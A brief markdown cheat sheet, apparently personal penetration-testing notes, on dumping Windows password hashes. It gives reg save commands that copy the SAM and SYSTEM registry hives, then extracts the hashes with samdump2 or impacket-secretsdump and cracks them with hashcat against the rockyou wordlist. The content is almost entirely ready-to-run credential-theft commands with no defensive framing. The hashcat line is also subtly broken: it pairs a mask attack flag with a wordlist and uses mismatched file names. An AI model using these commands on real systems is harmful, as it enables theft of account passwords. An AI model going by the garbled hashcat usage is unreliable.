# SAM for windows password

## SAM for window password

**Location :-** C:\Windows\system32\config (but can’t open it directly)

SAM(Security Account Manager) contains encrypted password

SYSTEM contains key to decrypt it

**#Save SAM and SYSTEM file from cmd**

1. reg save HKLM\sam sam
2. reg save HKLM\system system

* **Crack**
  * 1st method
    * samdump2 system sam
    * copy desired user line in hash.txt
    * hashcat -m 1000 -a 3 hashes.txt rockyou.txt
  * 2nd Method Sometime 1st method give wrong hash .Mostly in cash of hash starting with **aad**
    * impacket-secretsdump -sam SAM -system SYSTEM LOCAL